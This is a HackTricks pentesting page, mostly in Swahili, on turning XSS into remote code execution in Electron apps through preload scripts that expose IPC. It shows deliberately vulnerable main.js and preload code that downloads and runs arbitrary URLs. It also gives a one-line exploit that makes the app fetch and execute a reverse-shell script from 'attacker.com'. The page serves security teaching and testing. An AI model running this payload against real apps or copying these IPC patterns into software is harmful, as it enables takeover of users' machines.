Electron contextIsolation RCE via IPC

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Ikiwa skripti ya preload inatoa mwisho wa IPC kutoka kwa faili la main.js, mchakato wa renderer utaweza kuufikia na ikiwa ni hatarini, RCE inaweza kuwa inawezekana.

Mifano hii mingi ilichukuliwa kutoka hapa https://www.youtube.com/watch?v=xILfQGkLXQo. Angalia video kwa maelezo zaidi.

Mfano 0

Mfano kutoka https://speakerdeck.com/masatokinugawa/how-i-hacked-microsoft-teams-and-got-150000-dollars-in-pwn2own?slide=21 (una mfano kamili wa jinsi MS Teams ilivyokuwa ikitumia XSS hadi RCE katika slaidi hizo, huu ni mfano wa msingi sana):

Mfano 1

Angalia jinsi main.js inasikiliza kwenye getUpdate na it apakue na kutekeleza URL yoyote iliyopitishwa. Angalia pia jinsi preload.js inatoa tukio lolote la IPC kutoka kwa main.

// Part of code of main.js
ipcMain.on('getUpdate', (event, url) => {
console.log('getUpdate: ' + url)
mainWindow.webContents.downloadURL(url)
mainWindow.download_url = url
});

mainWindow.webContents.session.on('will-download', (event, item, webContents) => {
console.log('downloads path=' + app.getPath('downloads'))
console.log('mainWindow.download_url=' + mainWindow.download_url);
url_parts = mainWindow.download_url.split('/')
filename = url_parts[url_parts.length-1]
mainWindow.downloadPath = app.getPath('downloads') + '/' + filename
console.log('downloadPath=' + mainWindow.downloadPath)
// Set the save path, making Electron not to prompt a save dialog.
item.setSavePath(mainWindow.downloadPath)

item.on('updated', (event, state) => {
if (state === 'interrupted') {
console.log('Download is interrupted but can be resumed')
}
else if (state === 'progressing') {
if (item.isPaused()) console.log('Download is paused')
else console.log(`Received bytes: ${item.getReceivedBytes()}`)
}
})

item.once('done', (event, state) => {
if (state === 'completed') {
console.log('Download successful, running update')
fs.chmodSync(mainWindow.downloadPath, 0755);
var child = require('child_process').execFile;
child(mainWindow.downloadPath, function(err, data) {
if (err) { console.error(err); return; }
console.log(data.toString());
});
}
else console.log(`Download failed: ${state}`)
})
})

// Part of code of preload.js
window.electronSend = (event, data) => {
ipcRenderer.send(event, data);
};

Exploit:

<script>
electronSend("getUpdate","https://attacker.com/path/to/revshell.sh");
</script>

Mfano wa 2

Ikiwa skripti ya preload inatoa moja kwa moja kwa renderer njia ya kuita shell.openExternal inawezekana kupata RCE

// Part of preload.js code
window.electronOpenInBrowser = (url) => {
shell.openExternal(url);
};

Example 3

Ikiwa skripti ya preload inatoa njia za kuwasiliana kabisa na mchakato mkuu, XSS itakuwa na uwezo wa kutuma tukio lolote. Athari hii inategemea kile mchakato mkuu unachotoa katika suala la IPC.

window.electronListen = (event, cb) => {
ipcRenderer.on(event, cb);
};

window.electronSend = (event, data) => {
ipcRenderer.send(event, data);
};